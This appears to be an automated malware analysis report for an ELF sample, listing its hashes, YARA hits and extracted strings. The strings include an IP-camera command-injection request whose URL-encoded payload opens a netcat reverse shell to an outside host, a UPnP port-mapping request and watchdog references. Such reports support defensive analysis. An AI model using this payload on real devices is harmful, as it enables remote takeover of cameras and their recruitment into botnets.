Sample details: b2b129d84723d0ba2f803a546c8b19ae --

Hashes
MD5: b2b129d84723d0ba2f803a546c8b19ae
SHA1: 7a0485e52aa09f63d41e471fd736584c06c3dab6
SHA256: 44620a09441305f592fb65d606958611f90e85b62b7ef7149e613d794df3a778
SSDEEP: 1536:7nEC4keozPVl4Q9GZhhDuFvPqoQ+X4/BZl6b0ATQBOe5qDr1ueVeSP5JV:349O9EDuPg/BZjpOe5qX1uev5JV
Details
File Type: ELF
Yara Hits
YRP/contentis_base64 | YRP/url | YRP/domain | YRP/IP |
Strings
		 (!'9.
 0!'9.p
 0!'9.p
 !$Q8d<
-4Lfg'
M-SEARCH * HTTP/1.1
HOST:239.255.255.250:1900
ST:upnp:rootdevice
MAN:"ssdp:discover"
TSource Engine Query
 HTTP/1.1
Content-Length: 
Content-Length:
/proc/self/exe
/dev/watchdog
/dev/misc/watchdog
/tmp/ftpupdate.sh
/dev/null
/tmp/ftpupload.sh
2580e538f3723927f1ea2fdb8d57b99e9cc37ced1
023ea8c671c0abf77241886465200cf81b1a2bf5e
ntp.gtpnet.ir
64.36.240.17
sending
%D, %D
Server:
Location:
:52869/picsdesc.xml
 HTTP/1.1
SOAPACTION: 
Content-Type: application/xml
<?xml version="1.0"?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="
"><NewRemoteHost></NewRemoteHost><NewExternalPort>
</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>
</NewInternalPort><NewInternalClient>
</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>Skype</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
<presentationURL>
</presentationURL>
WANPPPConnection
WANIPConnection
urn:schemas-upnp-org:service:WANPPPConnection:1#AddPortMapping
<controlURL>
</controlURL>
urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
login.cgi
loginuser
loginpass="
loginuser="
/set_ftp.cgi?
loginuse=
&loginpas=
&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=
%24%28nc+load.gtpnet.ir+1234+-e+%2Fbin%2Fsh%29
/ftptest.cgi?
b$Exiting
Cookie: 
User-Agent: 
Host: 
/bin/sh
clntudp_create: out of memory
bad auth_len gid %d str %d auth %d
xdr_string: out of memory
xdr_bytes: out of memory
/etc/resolv.conf
/etc/config/resolv.conf
nameserver
domain
search
(null)
hlLjztqZ
npxXoudifFeEgGaACScs
 +0-#'I
 !"-N.Y]Z
#$%&'()*+,234567
;<=>?@ABCDEFGJIMOPQRSTUVWX[\^_`abcxyz{|}~
Unknown error 
Success
Operation not permitted
No such file or directory
No such process
Interrupted system call
Input/output error
No such device or address
Argument list too long
Exec format error
Bad file descriptor
No child processes
Resource temporarily unavailable
Cannot allocate memory
Permission denied
Bad address
Block device required
Device or resource busy
File exists
Invalid cross-device link
No such device
Not a directory
Is a directory
Invalid argument
Too many open files in system
Too many open files
Inappropriate ioctl for device
Text file busy
File too large
No space left on device
Illegal seek
Read-only file system
Too many links
Broken pipe
Numerical argument out of domain
Numerical result out of range
Resource deadlock avoided
File name too long
No locks available
Function not implemented
Directory not empty
Too many levels of symbolic links
No message of desired type
Identifier removed
Channel number out of range
Level 2 not synchronized
Level 3 halted
Level 3 reset
Link number out of range
Protocol driver not attached
No CSI structure available
Level 2 halted
Invalid exchange
Invalid request descriptor
Exchange full
No anode
Invalid request code
Invalid slot
Bad font file format
Device not a stream
No data available
Timer expired
Out of streams resources
Machine is not on the network
Package not installed
Object is remote
Link has been severed
Advertise error
Srmount error
Communication error on send
Protocol error
Multihop attempted
RFS specific error
Bad message
Value too large for defined data type
Name not unique on network
File descriptor in bad state
Remote address changed
Can not access a needed shared library
Accessing a corrupted shared library
.lib section in a.out corrupted
Attempting to link in too many shared libraries
Cannot exec a shared library directly
Invalid or incomplete multibyte or wide character
Interrupted system call should be restarted
Streams pipe error
Too many users
Socket operation on non-socket
Destination address required
Message too long
Protocol wrong type for socket
Protocol not available
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address family not supported by protocol
Address already in use
Cannot assign requested address
Network is down
Network is unreachable
Network dropped connection on reset
Software caused connection abort
Connection reset by peer
No buffer space available
Transport endpoint is already connected
Transport endpoint is not connected
Cannot send after transport endpoint shutdown
Too many references: cannot splice
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
Stale NFS file handle
Structure needs cleaning
Not a XENIX named type file
No XENIX semaphores available
Is a named type file
Remote I/O error
Disk quota exceeded
No medium found
Wrong medium type
File locking deadlock error
__get_myaddress: socket
__get_myaddress: ioctl (get interface configuration)
__get_myaddress: ioctl
Cannot register service
xdr_array: out of memory
0123456789abcdef
/etc/hosts
/etc/config/hosts
%s%s%m
<RPC: (unknown error code)
; errno = %s
; low version = %lu, high version = %lu
; why = 
(unknown authentication error - %d)
; s1 = %lu, s2 = %lu
Authentication OK
Invalid client credential
Server rejected credential
Invalid client verifier
Server rejected verifier
Client credential too weak
Invalid server verifier
Failed (unspecified error)
RPC: Success
RPC: Can't encode arguments
RPC: Can't decode result
RPC: Unable to send
RPC: Unable to receive
RPC: Timed out
RPC: Incompatible versions of RPC
RPC: Authentication error
RPC: Program unavailable
RPC: Program/version mismatch
RPC: Procedure unavailable
RPC: Server can't decode arguments
RPC: Remote system error
RPC: Unknown host
RPC: Unknown protocol
RPC: Port mapper failure
RPC: Program not registered
RPC: Failed (unspecified error)
.shstrtab
.rodata
.ctors
.dtors
.data.rel.ro
.mdebug.abi32